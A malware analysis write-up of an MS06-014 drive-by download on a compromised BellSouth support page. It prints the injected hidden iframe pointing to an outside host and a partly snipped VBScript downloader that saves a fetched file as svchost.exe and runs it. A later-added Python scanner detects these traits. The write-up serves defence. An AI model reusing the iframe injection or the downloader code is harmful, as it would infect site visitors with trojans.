Typical MS06-014 Exploit
Downloading of a Trojan by Remote Code Execution
Compromised Support Page at bellsouth.com




Multiple exploits are initially triggered by an iframe that redirects to the malware site:

iframe src=http://www.goldunix.com/hker.htm widht=0 height=0>/iframe>
____________________________________________________________________________

hker.htm does two things:

1) downloads test.htm, which is really an executable file in disguise

2) sets up to create svchost.exe

Here is the code in the hker.htm file:

__________________________________________________________________________

 script language="VBScript">
    on error resume next
    dl = "http://www.goldunix.com/test.htm"
   

.....snip.....

    x.Send
    fname1="svchost.exe"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    S.open
    fname1= F.BuildPath(tmp,fname1)
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
    /script>
    head>
    title>Hello!!!/title>
_________________________________________________________________________
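
An added example, not part of the original write-up: a small Python scanner that flags the two traits shown above, a zero-sized iframe and a script that writes a response body to disk and then runs it. The function names, sample strings and `.example` hosts are assumptions made for illustration.

```python
import re

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
# "wid\w{2}" also catches the misspelled "widht" seen in the injected tag.
ZERO_DIM = re.compile(r"\b(?:wid\w{2}|height)\s*=\s*[\"']?0(?![\d.%])", re.I)

# Script behaviours visible in the hker.htm fragment.
CHAIN = {
    "fso": re.compile(r"Scripting\.FileSystemObject", re.I),
    "temp_dir": re.compile(r"GetSpecialFolder\s*\(\s*2\s*\)", re.I),
    "write_body": re.compile(r"\.write\s*\(?\s*\w+\.responseBody", re.I),
    "save_file": re.compile(r"\.savetofile\b", re.I),
    "execute": re.compile(r"\.ShellExecute\b", re.I),
}
# A page that does all three saves a downloaded body and launches it.
DROP_AND_RUN = {"write_body", "save_file", "execute"}

def scan_page(html):
    """Return hidden iframe targets and download-save-execute indicators."""
    hidden = []
    for tag in IFRAME_TAG.findall(html):
        src = SRC.search(tag)
        if src and ZERO_DIM.search(tag):
            hidden.append(src.group(1))
    hits = {name for name, rx in CHAIN.items() if rx.search(html)}
    return {"hidden_iframes": hidden, "indicators": sorted(hits),
            "drop_and_run": DROP_AND_RUN <= hits}

# Constructed samples; the .example hosts are placeholders.
LANDING = '<p>Support</p><iframe src=http://malware.example/hker.htm widht=0 height=0></iframe>'
SCRIPT = '''<script language="VBScript">
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.write x.responseBody
S.savetofile fname1,2
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>'''
BENIGN = '<iframe src="https://video.example/embed" width="560" height="315"></iframe>'

if __name__ == "__main__":
    for name, page in (("landing", LANDING), ("script", SCRIPT), ("benign", BENIGN)):
        print(name, scan_page(page))
```

A normally sized iframe and a page with no script indicators both come back clean, so the check is suited to sweeping cached copies of served pages for injected content.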

When test.htm is allowed to run, the following happens in the background, and
the firewall alerts on the outbound connection.

test.htm copies itself as svchost.exe into c:\..\temp (typical malware action)

_____________________________________________________________

svchost.exe (aka test.htm) is the downloader and attempts to connect out to the internet.

_____________________________________________________________

Same old tricks attempting to install a trojan.

Reference:

Microsoft Security Bulletin MS06-014: Vulnerability in the Microsoft Data Access Components (MDAC) Function

